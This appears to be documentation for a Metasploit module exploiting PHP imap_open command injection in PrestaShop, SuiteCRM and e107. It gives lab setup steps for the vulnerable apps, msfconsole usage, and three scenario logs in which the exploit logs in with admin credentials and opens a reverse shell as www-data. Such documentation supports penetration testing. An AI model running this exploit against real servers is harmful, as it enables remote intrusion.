## Vulnerable Application

  The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php,
  if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session.
  On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's 
  `ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands.
  While many custom applications may use `imap_open`, it is reported that the following
  applications are vulnerable: 

* instantcms
* [HostCMS](https://github.com/HostCMS/hostcms6.free/blob/1d54bdefcd6c28918cb09dd7cb6aea404879b93f/modules/core/mail/imap.php#L140)
* [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
* [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
* [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
* SugarCRM

  Prestashop exploitation requires the admin URI, and administrator credentials.

  SuiteCRM exploitation requires administrator credentials.

  e107 v2 exploitation requires administrator credentials.

### Prestashop 1.7.2.4 on Ubuntu 16.04

Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.

```
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
```

Run the following database commands:

```
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```

```
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
```

Utilize the following configuration:

```
<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/prestashop/
     ServerName example.com
     ServerAlias www.example.com
     
     <Directory /var/www/html/prestashop/>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
     </Directory>
     
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
     
</VirtualHost>
```

```
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
```

Browse to the website, and install with default information.

```
sudo rm -rf /var/www/html/prestashop/install/
```

Now browse to `/admin`, and the first time you'll be redirected to the admin URI.  If not, `sudo ls /var/www/html/prestashop/admin*`.

### SuiteCRM 7.8.23 on Ubuntu 16.04

Mostly derived from [vultr.com](https://www.vultr.com/docs/how-to-install-suitecrm-on-ubuntu-16-04) but adding php's zip and mbstring packages.

```
sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
```

```
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf
```

Utilize the following configuration:

```
<VirtualHost *:80>
 ServerAdmin admin@yourdomain.com
 DocumentRoot /var/www/html/suitecrm/
 ServerName yourdomain.com
 ServerAlias www.yourdomain.com
<Directory /var/www/html/suitecrm/>
 Options FollowSymLinks
 AllowOverride All
</Directory>
 ErrorLog /var/log/apache2/suitecrm-error_log
 CustomLog /var/log/apache2/suitecrm-access_log common
</VirtualHost>
```

```
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql
```

### e107 2.1.9 on Ubuntu 16.04

Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-e107-cms-on-ubuntu-16-04-18-04-18-10-with-apache2-mariadb-and-php-7-2/),
however with php 7.0 instead of 7.2.

```
sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p
```

Run the following database commands:

```
CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```

```
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf
```

Utilize the following configuration:

```
<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/e107
     ServerName example.com
     ServerAlias www.example.com

     <Directory /var/www/html/e107/>
          Options FollowSymlinks
          AllowOverride All
          Require all granted
     </Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
    
     <Directory /var/www/html/e107/>
            RewriteEngine on
            RewriteBase /
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteRule ^(.*) index.php [PT,L]
    </Directory>
</VirtualHost>
```

```
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.server
sudo systemctl restart mysql.service
```

## Verification Steps

  1. Install a vulnerable application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/php_imap_open_rce```
  4. Do: ```set TARGETURI [URI]```
  5. Do: ```set USERNAME [username]```
  6. Do: ```set PASSWORD [password]```
  7. Do: ```set target [target]```
  8. Do: ```run```
  9. You should get a shell.

## Options

  **TARGETURI**

  The URI for the target.  This may change by target.  Default is ` `.
  Prestashop should be the admin URI, similar to `/admin2769gx8k3`.

## Scenarios

### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
  resource (presta.rb)> set TARGETURI /admin2769gx8k3
  TARGETURI => /admin2769gx8k3
  resource (presta.rb)> set USERNAME ubuntu@none.com
  USERNAME => ubuntu@none.com
  resource (presta.rb)> set PASSWORD ubuntuubuntu
  PASSWORD => ubuntuubuntu
  resource (presta.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (presta.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (presta.rb)> set target 0
  target => 0
  resource (presta.rb)> set verbose true
  verbose => true
  resource (presta.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Redirected to http://1.1.1.1/admin2769gx8k3/
  [*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
  [*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
  [*] Logging in with ubuntu@none.com:ubuntuubuntu
  [*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
  [+] Login Success, loading admin dashboard to pull tokens
  [*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
  [+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
  [*] IMAP server change left on server, manual revert required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500
  
  uname -a
  Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

### SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
  resource (suitecrm.rb)> set target 1
  target => 1
  resource (suitecrm.rb)> set TARGETURI /
  TARGETURI => /
  resource (suitecrm.rb)> set USERNAME admin
  USERNAME => admin
  resource (suitecrm.rb)> set PASSWORD admin
  PASSWORD => admin
  resource (suitecrm.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (suitecrm.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (suitecrm.rb)> set verbose true
  verbose => true
  resource (suitecrm.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Loading login page
  [*] Logging in as admin:admin
  [+] Login Success
  [*] Loading InboundEmail page
  [+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
  [*] IMAP server config left on server, manual removal required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500
  
  uname -a 
  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

### e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
  resource (e107.rb)> set target 2
  target => 2
  resource (e107.rb)> set TARGETURI /
  TARGETURI => /
  resource (e107.rb)> set USERNAME admin
  USERNAME => admin
  resource (e107.rb)> set PASSWORD admin
  PASSWORD => admin
  resource (e107.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (e107.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (e107.rb)> set verbose true
  verbose => true
  resource (e107.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Logging in as admin:admin
  [+] Login Success
  [*] Checking if Cron is enabled for triggering
  [+] Storing payload in mail settings
  [*] Loading cron page to execute job manually
  [+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
  [*] IMAP server config left on server, manual removal required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500
  
  uname -a
  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```